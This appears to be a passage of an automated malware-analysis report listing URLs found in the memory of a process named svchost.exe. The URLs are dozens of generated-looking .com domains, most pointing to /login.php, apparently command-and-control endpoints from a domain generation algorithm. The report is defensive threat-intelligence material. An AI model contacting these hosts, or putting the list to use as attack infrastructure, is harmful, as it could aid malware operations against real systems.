Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352433999.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/http://ganykah.com/http://volygyt.com/http://pupyxuq.com/http://pupyxuq.com/
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/http://pupypil.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599280642.00000000046FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygul.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymel.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003764256.000000000B4FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2007310582.000000000B4FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004799359.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998684932.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001263336.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017895415.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyxyl.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001269447.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2002557567.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006795851.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjig.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyliq.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462483307.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymuv.com/login.php
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyxep.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycuv.com/login.php
Source: svchost.exe, 00000002.00000003.2394184434.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425878319.00000000029D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403666807.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423753303.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552251426.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2531545855.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398397242.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181277.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjuv.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078383290.000000000B4DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymol.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575876726.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2603102836.000000000673B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypil.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypiv.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362751556.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytyl.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupywog.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/http://gadycih.com/http://pupypil.com/http://gadycih.com/H
Source: svchost.exe, 00000002.00000002.2587888808.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585483183.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602250771.0000000006674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/login.php
Source: svchost.exe, 00000002.00000003.2023916183.00000000066AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020443071.00000000066A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023729607.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purybav.com/http://purybav.com/H
